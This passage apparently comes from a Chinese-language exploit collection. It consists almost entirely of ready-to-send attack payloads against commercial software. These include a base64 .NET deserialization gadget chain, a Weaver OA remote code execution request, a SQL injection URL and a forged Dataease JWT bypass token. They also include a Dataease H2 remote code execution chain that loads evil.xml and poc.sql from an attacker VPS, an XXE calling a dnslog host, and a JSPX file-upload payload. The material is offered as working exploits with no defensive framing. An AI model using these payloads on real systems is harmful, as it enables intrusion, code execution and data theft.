QAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=</strFormAssignment>
1417 | <isBase>false</isBase>
1418 | </GetChildFormAndEntityList>
1419 | </soap:Body>
1420 | </soap:Envelope>
1421 | 
1422 | 
1423 | 泛微OA后台RCE
1424 | POST /interface/outter/outter_encryptclassOperation.jsp?a=1.swf HTTP/1.1
1425 | Host: xxxx:xxx
1426 | If-None-Match: "6evu6PUo/Cz"
1427 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
1428 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1429 | Accept-Encoding: gzip, deflate
1430 | If-Modified-Since: Thu, 23 Jun 2022 11:04:04 GMT
1431 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVnIIu
1432 | Cache-Control: max-age=0
1433 | Upgrade-Insecure-Requests: 1
1434 | Cache-Name: 5bCP6Im+
1435 | Accept-Language: zh-CN,zh;q=0.9
1436 | Cookie: ecology_JSessionid=aaa_db33mBm_EaOGEO8bz; __randcode__=b7e3d245-5b6b-44ba-b06b-f4b5592d68dc
1437 | 
1438 | 
1439 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1440 | Content-Disposition: form-data; name="operation"
1441 | 
1442 | add
1443 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1444 | Content-Disposition: form-data; name="encryptname"
1445 | 
1446 | ttttaaa
1447 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1448 | Content-Disposition: form-data; name="encryptclass"
1449 | 
1450 | org.mvel2.sh.ShellSession
1451 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1452 | Content-Disposition: form-data; name="encryptmethod"
1453 | 
1454 | exec
1455 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1456 | Content-Disposition: form-data; name="decryptmethod"
1457 | 
1458 | exec
1459 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1460 | Content-Disposition: form-data; name="isdialog"
1461 | 
1462 | 0
1463 | ------WebKitFormBoundaryVnIIugCdViAmEyK3
1464 | Content-Disposition: form-data; name="x"; filename="x"
1465 | 
1466 | x
1467 | ------WebKitFormBoundaryVnIIugCdViAmEyK3--
1468 | 
1469 | 
1470 | 
1471 | 
1472 | POST /api/integration/Outter/getOutterSysEncryptClassOperates?a=1.swf HTTP/1.1
1473 | Host: xxxx:xxx
1474 | If-None-Match: "6evu6PUo/Cz"
1475 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
1476 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1477 | Accept-Encoding: gzip, deflate
1478 | If-Modified-Since: Thu, 23 Jun 2022 11:04:04 GMT
1479 | Content-Type: application/x-www-form-urlencoded
1480 | Cache-Control: max-age=0
1481 | Upgrade-Insecure-Requests: 1
1482 | Cache-Name: 5bCP6Im+
1483 | Accept-Language: zh-CN,zh;q=0.9
1484 | Cookie: ecology_JSessionid=aaa_db33mBm_EaOGEO8bz; __randcode__=b7e3d245-5b6b-44ba-b06b-f4b5592d68dc
1485 | 
1486 | 
1487 | 
1488 | 
1489 | POST /interface/outter/outter_encryptclassOperation.jsp?a=1.swf HTTP/1.1
1490 | Host: xxxx:xxx
1491 | If-None-Match: "6evu6PUo/Cz"
1492 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
1493 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1494 | Accept-Encoding: gzip, deflate
1495 | If-Modified-Since: Thu, 23 Jun 2022 11:04:04 GMT
1496 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryITdrx
1497 | Cache-Control: max-age=0
1498 | Upgrade-Insecure-Requests: 1
1499 | Accept-Language: zh-CN,zh;q=0.9
1500 | Cache-Name: 5bCP6Im+
1501 | Cookie: ecology_JSessionid=aaa_db33mBm_EaOGEO8bz; __randcode__=b7e3d245-5b6b-44ba-b06b-f4b5592d68dc
1502 | 
1503 | 
1504 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
1505 | Content-Disposition: form-data; name="operation"
1506 | 
1507 | test
1508 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
1509 | Content-Disposition: form-data; name="plaintext"
1510 | 
1511 | 马子
1512 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
1513 | Content-Disposition: form-data; name="id"
1514 | 
1515 | 2
1516 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
1517 | Content-Disposition: form-data; name="x"; filename="x"
1518 | 
1519 | 1
1520 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq--
1521 | 
1522 | 
1523 | 
1524 | 华测监测预警系统 sysGroupEdit.aspx SQL注入
1525 | GET /Web/SysManage/sysGroupEdit.aspx?id=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2889%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2869%29%2BCHAR%28118%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%2866%29%2BCHAR%2899%29%2BCHAR%2868%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%2875%29%2BCHAR%2876%29%2BCHAR%28115%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%2873%29%2BCHAR%2888%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2876%29%2BCHAR%2880%29%2BCHAR%2898%29%2BCHAR%28119%29%2BCHAR%2889%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28113%29--+wkZw
1526 | 
1527 | Dataease JWT 认证绕过漏洞(CVE-2025-49001)
1528 | GET /de2api/user/info HTTP/1.1
1529 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
1530 | Accept-Encoding: gzip, deflate
1531 | Accept: application/json, text/plain, */*
1532 | Connection: close
1533 | Host: xx.x.xx.xx
1534 | out_auth_platform: default
1535 | X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
1536 | 
1537 | Dataease H2数据库远程代码执行漏洞(CVE-2025-49002)
1538 | evil.xml
1539 | <?xml version="1.0" encoding="UTF-8" ?>
1540 | <beans xmlns="http://www.springframework.org/schema/beans"
1541 |        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
1542 |        xsi:schemaLocation="
1543 |      http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
1544 | 
1545 |     <!-- 使用DNSLog外带信息 -->
1546 |     <bean class="java.net.InetAddress" factory-method="getByName">
1547 |             <constructor-arg value="http://dnslog"/>
1548 |     </bean>
1549 | </beans>
1550 | 
1551 | poc.sql
1552 | CREATE ALIAS CLASS_FOR_NAME FOR 'java.lang.Class.forName(java.lang.String)';
1553 | CREATE ALIAS NEW_INSTANCE FOR 'org.springframework.cglib.core.ReflectUtils.newInstance(java.lang.Class, java.lang.Class[], java.lang.Object[])';
1554 | CREATE ALIAS UNESCAPE_VALUE FOR 'javax.naming.ldap.Rdn.unescapeValue(java.lang.String)';
1555 | 
1556 | SET @url_str='http://your-vps/evil.xml';
1557 | SET @url_obj=UNESCAPE_VALUE(@url_str);
1558 | SET @context_clazz=CLASS_FOR_NAME('org.springframework.context.support.ClassPathXmlApplicationContext');
1559 | SET @string_clazz=CLASS_FOR_NAME('java.lang.String');
1560 | 
1561 | CALL NEW_INSTANCE(@context_clazz, ARRAY[@string_clazz], ARRAY[@url_obj]);
1562 | 
1563 | POST /de2api/datasource/validate HTTP/1.1
1564 | Host: your-ip
1565 | Accept-Encoding: gzip, deflate, br, zstd
1566 | sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"
1567 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
1568 | Accept: application/json, text/plain, */*
1569 | X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
1570 | Accept-Language: zh-CN
1571 | Sec-Fetch-Dest: empty
1572 | sec-ch-ua-mobile: ?0
1573 | Sec-Fetch-Site: same-origin
1574 | sec-ch-ua-platform: "Windows"
1575 | Content-Type: application/json
1576 | Sec-Fetch-Mode: cors
1577 | Content-Length: 821
1578 | 
1579 | {
1580 |     "id": "",
1581 |     "name": "11",
1582 |     "description": "",
1583 |     "type": "h2",
1584 |     "apiConfiguration": [],
1585 |     "paramsConfiguration": [],
1586 |     "enableDataFill": false,
1587 |     "configuration": "eyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0ZGI7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO2luaXQ9UlVuU0NSSVBUIEZST00gJ2h0dHA6Ly95b3VyLXZwczoyMzMzL3BvYy5zcWwnIiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwicGFzc3dvcmQiOiIxMjMiLCJob3N0IjoiIiwiYXV0aE1ldGhvZCI6IiIsInBvcnQiOjAsImluaXRpYWxQb29sU2l6ZSI6NSwibWluUG9vbFNpemUiOjUsIm1heFBvb2xTaXplIjo1LCJxdWVyeVRpbWVvdXQiOjMwfQ=="
1588 | }
1589 | 
1590 | 金和OA-C6系统ActionDataSet接口XXE漏洞
1591 | POST /jc6/servlet/ActionDataSet HTTP/1.1
1592 | Host: 
1593 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
1594 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1595 | Accept-Encoding: gzip, deflate
1596 | Content-Type: application/xml
1597 | Accept-Language: zh-CN,zh;q=0.9
1598 | Connection: close
1599 | 
1600 | <?xml version="1.0" encoding="UTF-8"?>
1601 | <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://323232323.xxxx.dnslog.cn"> %remote;]>
1602 | 
1603 | 北京时空智友ERP系统 updater.uploadStudioFile 文件上传漏洞
1604 | POST /formservice?service=updater.uploadStudioFile HTTP/1.1
1605 | Host: xxxx.com
1606 | Content-Type: application/x-www-form-urlencoded
1607 | 
1608 | content=<updater xmlns:jsp="http://java.sun.com/JSP/Page"><filename>test.jspx</filename><filepath>../../../images/</filepath><filesize>347</filesize><lmtime>{{time()}}</lmtime><jsp:scriptlet>out.println(java.util.UUID.randomUUID().toString());new java.io.File(application.getRealPath(request.getServletPath())).delete();</jsp:scriptlet></updater>
1609 | 


--------------------------------------------------------------------------------